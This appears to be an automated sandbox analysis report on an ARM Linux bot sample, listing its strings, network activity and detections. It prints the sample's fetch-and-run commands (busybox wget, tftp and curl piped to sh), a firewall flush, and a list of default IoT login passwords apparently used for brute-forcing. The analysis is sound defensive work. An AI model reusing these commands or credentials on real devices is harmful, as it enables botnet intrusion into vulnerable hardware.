Click to jump to signature section
Source: arm5.elf | ReversingLabs: Detection: 31% |
Source: arm5.elf | String: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68k |
Source: /tmp/arm5.elf (PID: 5508) | Socket: 127.0.0.1:43478 | Jump to behavior |
Source: unknown | TCP traffic detected without corresponding DNS query: 54.171.230.55 |
Source: unknown | TCP traffic detected without corresponding DNS query: 54.171.230.55 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com |
Source: arm5.elf | String found in binary or memory: http:///curl.sh |
Source: arm5.elf | String found in binary or memory: http:///wget.sh |
Source: unknown | Network traffic detected: HTTP traffic on port 37904 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 37904 |
Source: Initial sample | String containing 'busybox' found: usage: busybox |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample | String containing 'busybox' found: /bin/busybox |
Source: Initial sample | String containing 'busybox' found: /bin/busybox hostname FICORA |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample | String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g |
Source: Initial sample | String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget |
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo |
Source: Initial sample | String containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195 |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne >> > upnprootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd echo '#!/bin/sh' > check_pids.sh |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68k |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: classification engine | Classification label: mal56.troj.linELF@0/0@2/0 |
Source: /usr/bin/dash (PID: 5554) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.X9MGmBmtBJ /tmp/tmp.tbvJOKURSG /tmp/tmp.R2QNHYP45D | Jump to behavior |
Source: /usr/bin/dash (PID: 5555) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.X9MGmBmtBJ /tmp/tmp.tbvJOKURSG /tmp/tmp.R2QNHYP45D | Jump to behavior |
Source: /tmp/arm5.elf (PID: 5508) | Queries kernel information via 'uname': | Jump to behavior |
Source: arm5.elf, 5508.1.00007ffd1c5c3000.00007ffd1c5e4000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf |
Source: arm5.elf, 5508.1.0000555c7a3da000.0000555c7a528000.rw-.sdmp | Binary or memory string: ?z\U!/etc/qemu-binfmt/arm |
Source: arm5.elf, 5508.1.0000555c7a3da000.0000555c7a528000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm |
Source: arm5.elf, 5508.1.00007ffd1c5c3000.00007ffd1c5e4000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm |
Source: arm5.elf, 5508.1.00007ffd1c5c3000.00007ffd1c5e4000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: Yara match | File source: arm5.elf, type: SAMPLE |
Source: Yara match | File source: 5508.1.00007f3b90017000.00007f3b9002f000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: arm5.elf, type: SAMPLE |
Source: Yara match | File source: 5508.1.00007f3b90017000.00007f3b9002f000.r-x.sdmp, type: MEMORY |